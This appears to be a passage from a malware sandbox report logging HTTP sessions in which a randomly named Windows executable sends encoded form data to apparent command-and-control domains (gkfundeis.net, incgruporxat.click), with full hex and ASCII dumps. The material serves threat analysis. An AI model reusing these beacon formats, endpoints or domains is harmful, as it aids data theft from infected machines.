13	192.168.2.5	49993	62.116.130.8	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:59:58.577214003 CET	712	OUT	POST /zd1g/ HTTP/1.1 Host: www.gkfundeis.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.gkfundeis.net Referer: http://www.gkfundeis.net/zd1g/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 58 74 62 42 76 62 67 63 4a 62 72 6a 4e 57 6b 6a 64 4c 61 75 2b 48 4b 71 4f 5a 64 42 52 34 53 71 79 4e 61 39 77 4a 57 6e 50 67 34 4e 2f 49 47 54 6e 7a 4e 41 6b 57 53 73 44 63 7a 45 54 78 49 6f 58 33 72 6b 63 43 63 70 33 48 32 38 6f 39 62 65 6b 59 41 31 53 54 52 78 76 50 36 62 77 7a 49 55 49 46 66 65 4f 61 46 47 39 4e 42 69 6f 79 39 35 38 53 76 7a 50 33 61 54 31 2b 58 54 69 6c 4c 73 56 75 74 71 34 54 63 77 74 6d 4b 4a 63 54 6c 58 7a 4e 51 4c 77 6a 38 53 52 34 6c 43 4f 6b 2b 51 32 39 4a 2f 44 42 68 48 65 41 70 34 79 58 4b 7a 66 79 4f 6b 42 6b 57 2f 4a 59 3d Data Ascii: oxIxzhP=KIF/4Uzdz85BCXtbBvbgcJbrjNWkjdLau+HKqOZdBR4SqyNa9wJWnPg4N/IGTnzNAkWSsDczETxIoX3rkcCcp3H28o9bekYA1STRxvP6bwzIUIFfeOaFG9NBioy958SvzP3aT1+XTilLsVutq4TcwtmKJcTlXzNQLwj8SR4lCOk+Q29J/DBhHeAp4yXKzfyOkBkW/JY=
Jan 11, 2025 07:59:59.214616060 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 06:59:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Redirector-ID: 1350dafe25eb09a16198a9a7554866f28ef3a391bbf976056df9ff7315709eaf Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49994	62.116.130.8	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:01.278460026 CET	732	OUT	POST /zd1g/ HTTP/1.1 Host: www.gkfundeis.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.gkfundeis.net Referer: http://www.gkfundeis.net/zd1g/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 33 39 62 53 63 44 67 55 4a 62 6f 2f 39 57 6b 74 39 4c 42 75 2b 4c 4b 71 4b 49 61 47 6b 51 53 72 58 70 61 2b 31 6c 57 6b 50 67 34 47 66 49 66 4e 58 7a 4b 41 6b 61 67 73 47 6b 7a 45 54 31 49 6f 53 7a 72 6b 76 61 66 6f 6e 48 30 69 49 39 5a 51 45 59 41 31 53 54 52 78 76 61 52 62 77 62 49 56 34 31 66 65 73 7a 33 64 64 4e 43 6c 6f 79 39 76 38 53 6a 7a 50 33 30 54 77 6d 39 54 67 64 4c 73 56 65 74 71 74 6e 64 6e 64 6d 4d 45 38 53 61 59 7a 68 66 4d 44 4c 33 57 33 70 61 63 66 34 5a 63 67 4d 6a 6c 68 4a 4a 55 2b 73 52 6f 68 66 39 69 76 54 6e 2b 69 30 6d 68 65 4f 6c 63 33 53 72 58 48 53 52 58 68 5a 34 7a 6d 44 41 53 52 54 37 Data Ascii: oxIxzhP=KIF/4Uzdz85BC39bScDgUJbo/9Wkt9LBu+LKqKIaGkQSrXpa+1lWkPg4GfIfNXzKAkagsGkzET1IoSzrkvafonH0iI9ZQEYA1STRxvaRbwbIV41fesz3ddNCloy9v8SjzP30Twm9TgdLsVetqtndndmME8SaYzhfMDL3W3pacf4ZcgMjlhJJU+sRohf9ivTn+i0mheOlc3SrXHSRXhZ4zmDASRT7
Jan 11, 2025 08:00:01.796319962 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 07:00:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Redirector-ID: 1350dafe25eb09a16198a9a7554866f28ef3a391bbf976056df9ff7315709eaf Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49995	62.116.130.8	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:03.849353075 CET	1749	OUT	POST /zd1g/ HTTP/1.1 Host: www.gkfundeis.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.gkfundeis.net Referer: http://www.gkfundeis.net/zd1g/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 33 39 62 53 63 44 67 55 4a 62 6f 2f 39 57 6b 74 39 4c 42 75 2b 4c 4b 71 4b 49 61 47 69 49 53 71 6b 52 61 38 57 39 57 6c 50 67 34 61 76 49 43 4e 58 79 50 41 6b 43 6b 73 47 34 4e 45 52 39 49 70 77 37 72 69 65 61 66 68 6e 48 30 71 6f 39 59 65 6b 5a 43 31 53 43 59 78 76 4b 52 62 77 62 49 56 36 74 66 63 2b 62 33 66 64 4e 42 69 6f 79 68 35 38 54 30 7a 50 76 43 54 77 53 48 55 52 39 4c 73 78 79 74 6d 2f 50 64 6c 39 6d 4f 48 38 53 43 59 7a 73 66 4d 43 6e 56 57 33 31 67 63 59 55 5a 5a 42 39 61 78 46 46 4f 42 39 77 53 6f 41 48 6e 37 66 6e 2f 36 54 6b 53 68 4e 61 41 62 57 54 63 42 7a 75 73 5a 79 74 79 77 67 33 50 44 6c 32 6d 54 6f 5a 65 66 78 67 41 67 70 6d 45 51 32 39 47 73 4a 67 67 77 4c 69 47 77 35 59 37 61 71 4f 78 4e 53 61 45 66 73 78 73 34 76 45 58 47 66 79 51 61 66 63 43 69 78 72 33 61 54 52 59 6d 76 54 44 6c 49 71 7a 56 2b 32 56 39 49 77 76 6a 4e 70 41 66 6e 47 56 46 47 52 79 59 77 69 77 67 5a 73 59 6a 2b 5a 50 72 69 79 33 33 57 36 50 45 4c [TRUNCATED] Data Ascii: oxIxzhP=KIF/4Uzdz85BC39bScDgUJbo/9Wkt9LBu+LKqKIaGiISqkRa8W9WlPg4avICNXyPAkCksG4NER9Ipw7rieafhnH0qo9YekZC1SCYxvKRbwbIV6tfc+b3fdNBioyh58T0zPvCTwSHUR9Lsxytm/Pdl9mOH8SCYzsfMCnVW31gcYUZZB9axFFOB9wSoAHn7fn/6TkShNaAbWTcBzusZytywg3PDl2mToZefxgAgpmEQ29GsJggwLiGw5Y7aqOxNSaEfsxs4vEXGfyQafcCixr3aTRYmvTDlIqzV+2V9IwvjNpAfnGVFGRyYwiwgZsYj+ZPriy33W6PEL3T8kWVwi/FHIhr6Jwu42NNVR5HXnVcRkeZPg4AJaHdk7qHJoztgKbVn5JYuD7Wk+4WHX2gBcH5IxXRKpVhsC/COTkYdD8mGckVFfvw+9S7XV2i6D8vC5SFxmyiYSwh42Z2/BhkSKaJjWd0VrNi/o2hYDG/gnDXdwzbF/JLgRq0za61PwvWp9+GyAci6iGagVSNxwrhLvL8lE3snKA/TS4TM4KBlYDfCE75WbKwjb8Et8Tkc/Ghbs3M4xEDi9KqqZc9ue6cwNQY0ix0T6hef+D9cquCjlECIFn/Gd2dLV4wOcdy/uX3qCZ1ygRkKt2D+tW4NdbNNWLR3fbHYNim+WGrM5Of9LmRZPz62Kr73a+u+lG+flScKLbfgVMkxCgtmvtlkDr9cU21GQKxvyQHsAEVcuTs9RDRDAo3yDoud3KDBsNGVo1JSmQ6MFgz0TNztMZKLp26Vy3IcyeaAPyxa5iqL2TPOgzsK+9TFGoiST5f76slCf8BiP1lJWiYLHj+hiauwxFeLCQH2l8zoUitnt2q3XDxAUpvVm/x4M5wvy4xKxWU2TBn2OdIFG5kC69VIK9wIZOufhCfEXcVukLP0Qw8aifkoP/VTEjsQRE7dBGTiBOyEvn9yUV+WKf7EjL+5F5e5PFX9q/b5Y2NYwQ36WQl9PRhgrWj0bUV [TRUNCATED]
Jan 11, 2025 08:00:04.456414938 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 07:00:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Redirector-ID: 1350dafe25eb09a16198a9a7554866f28ef3a391bbf976056df9ff7315709eaf Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49996	62.116.130.8	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:06.590540886 CET	450	OUT	GET /zd1g/?qHO8p=hd0DQ8&oxIxzhP=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysilDdp5xTdm5FiVTX/I7wXG7gTv5deuaYX5Iiu5CYwfmrvg== HTTP/1.1 Host: www.gkfundeis.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 08:00:07.246386051 CET	436	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 07:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Redirector-ID: 1350dafe25eb09a16198a9a7554866f28ef3a391bbf976056df9ff7315709eaf IX-Cache-Status: MISS Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49997	104.21.88.139	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:12.295887947 CET	727	OUT	POST /ryxy/ HTTP/1.1 Host: www.incgruporxat.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.incgruporxat.click Referer: http://www.incgruporxat.click/ryxy/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2f 32 58 36 7a 4c 7a 62 69 4d 71 4c 71 34 77 4b 44 6e 59 44 2f 66 43 71 69 46 35 6b 5a 63 71 79 57 72 50 51 33 59 79 6a 72 52 52 65 6a 44 48 57 70 77 67 63 48 71 77 6c 4f 64 76 57 56 31 6c 6e 6b 75 52 68 57 56 4b 62 65 6f 45 43 59 74 34 41 61 41 5a 7a 36 58 52 6f 62 53 63 62 77 50 59 48 38 67 41 6e 75 41 63 50 51 72 51 61 48 32 52 37 56 72 6a 38 34 38 72 56 67 36 54 75 68 61 6d 39 38 4b 34 76 31 7a 45 31 79 71 71 59 4d 76 57 30 4b 76 75 4d 5a 59 50 63 34 6d 65 4f 67 4e 31 6e 30 49 35 43 55 71 48 33 77 77 64 6e 6a 2f 4a 73 66 73 36 59 73 4c 73 6d 6b 72 51 3d Data Ascii: oxIxzhP=0lnW1dqIOUd0/2X6zLzbiMqLq4wKDnYD/fCqiF5kZcqyWrPQ3YyjrRRejDHWpwgcHqwlOdvWV1lnkuRhWVKbeoECYt4AaAZz6XRobScbwPYH8gAnuAcPQrQaH2R7Vrj848rVg6Tuham98K4v1zE1yqqYMvW0KvuMZYPc4meOgN1n0I5CUqH3wwdnj/Jsfs6YsLsmkrQ=
Jan 11, 2025 08:00:12.911812067 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 07:00:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oChYyoUJ4nE8fntKk%2BwUhaexchI5hGUuItQLc9h0q6i8Texeta4bEhmN%2B8UJ16nNRpU0%2BjQokhgjzRpz8CCcjMOfogz2sNQaCo%2F%2FHjOIBO83dq8fpWijqk3M5Hy3Nt3eB3QNMzCdYJnB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003074b4d9f7c99-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1841&rtt_var=920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9\|F3"S+i@O]OH,2h
Jan 11, 2025 08:00:12.911858082 CET	427	IN	Data Raw: 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 Data Ascii: weWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49998	104.21.88.139	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:14.840133905 CET	747	OUT	POST /ryxy/ HTTP/1.1 Host: www.incgruporxat.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.incgruporxat.click Referer: http://www.incgruporxat.click/ryxy/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2b 55 44 36 78 6f 62 62 6a 73 71 45 32 6f 77 4b 4b 48 59 48 2f 66 47 71 69 45 39 4b 61 70 61 79 56 4c 2f 51 6c 4d 65 6a 69 42 52 65 70 6a 48 54 32 67 68 53 48 71 38 48 4f 5a 6e 57 56 31 42 6e 6b 76 68 68 57 47 53 59 45 59 45 4d 4e 39 34 43 48 77 5a 7a 36 58 52 6f 62 53 59 78 77 4a 77 48 38 51 77 6e 76 68 63 4d 5a 4c 51 5a 41 32 52 37 45 37 6a 34 34 38 71 47 67 2f 76 45 68 59 75 39 38 49 67 76 73 42 73 79 37 71 72 52 49 76 58 35 47 4b 58 72 63 6f 2f 63 30 32 4c 39 6a 64 5a 68 78 2b 49 6f 4f 49 50 66 6a 51 78 66 7a 73 42 62 4f 63 62 78 32 6f 38 57 36 38 48 57 6a 77 72 48 4f 30 79 50 4f 6c 6f 79 7a 6e 49 58 35 48 37 6d Data Ascii: oxIxzhP=0lnW1dqIOUd0+UD6xobbjsqE2owKKHYH/fGqiE9KapayVL/QlMejiBRepjHT2ghSHq8HOZnWV1BnkvhhWGSYEYEMN94CHwZz6XRobSYxwJwH8QwnvhcMZLQZA2R7E7j448qGg/vEhYu98IgvsBsy7qrRIvX5GKXrco/c02L9jdZhx+IoOIPfjQxfzsBbOcbx2o8W68HWjwrHO0yPOloyznIX5H7m
Jan 11, 2025 08:00:15.457748890 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 07:00:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mW1uonN3Qx6cCrkkbT9NsdMv6LHbixRevCaeQTvts6UgoyhImddWy6lVuG0pDiNSjC3bUznZ1QcIRen18a8FIS3Sd2TJef8GFx6sybzj5myCFErUA2H16bp06ADqrLpT9GwgygOt6stj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003075b2d6bc340-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1479&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9\|F3"S+i@O]OH,2hweWBO6}#
Jan 11, 2025 08:00:15.457775116 CET	417	IN	Data Raw: a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 Data Ascii: !{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP=gH4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49999	104.21.88.139	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:17.389596939 CET	1764	OUT	POST /ryxy/ HTTP/1.1 Host: www.incgruporxat.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.incgruporxat.click Referer: http://www.incgruporxat.click/ryxy/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2b 55 44 36 78 6f 62 62 6a 73 71 45 32 6f 77 4b 4b 48 59 48 2f 66 47 71 69 45 39 4b 61 6f 4f 79 56 35 33 51 33 39 65 6a 34 42 52 65 33 7a 48 6f 32 67 67 4f 48 71 30 44 4f 5a 71 74 56 33 70 6e 31 39 35 68 42 6e 53 59 4b 6f 45 4d 50 39 34 44 61 41 5a 71 36 57 68 73 62 52 77 78 77 4a 77 48 38 53 59 6e 6f 77 63 4d 66 4c 51 61 48 32 52 33 56 72 6a 41 34 38 69 57 67 2b 62 2b 67 6f 4f 39 39 6f 77 76 75 55 77 79 6e 36 72 66 45 50 57 71 47 4b 54 30 63 72 4c 71 30 31 58 58 6a 63 74 68 79 34 64 4d 65 59 62 4c 30 33 42 34 77 37 39 33 61 70 48 73 34 6f 6c 74 2b 66 75 79 75 51 2f 74 49 77 79 56 50 52 74 49 6d 41 78 44 39 7a 75 50 43 45 53 5a 72 48 6c 6d 61 59 67 77 4f 35 6c 36 43 6e 78 30 6f 76 69 30 39 4f 45 54 7a 6d 67 6c 2b 43 59 62 30 50 76 52 79 6d 79 32 34 4b 56 70 6c 77 32 39 39 77 75 4f 79 69 39 2b 6e 4e 44 50 34 6f 4d 76 39 61 43 36 55 62 4a 70 4d 78 6c 6c 57 35 64 71 71 6f 61 76 4e 4b 43 42 6d 31 59 48 59 43 6c 69 41 73 6e 2b 50 4a 41 5a 56 49 [TRUNCATED] Data Ascii: 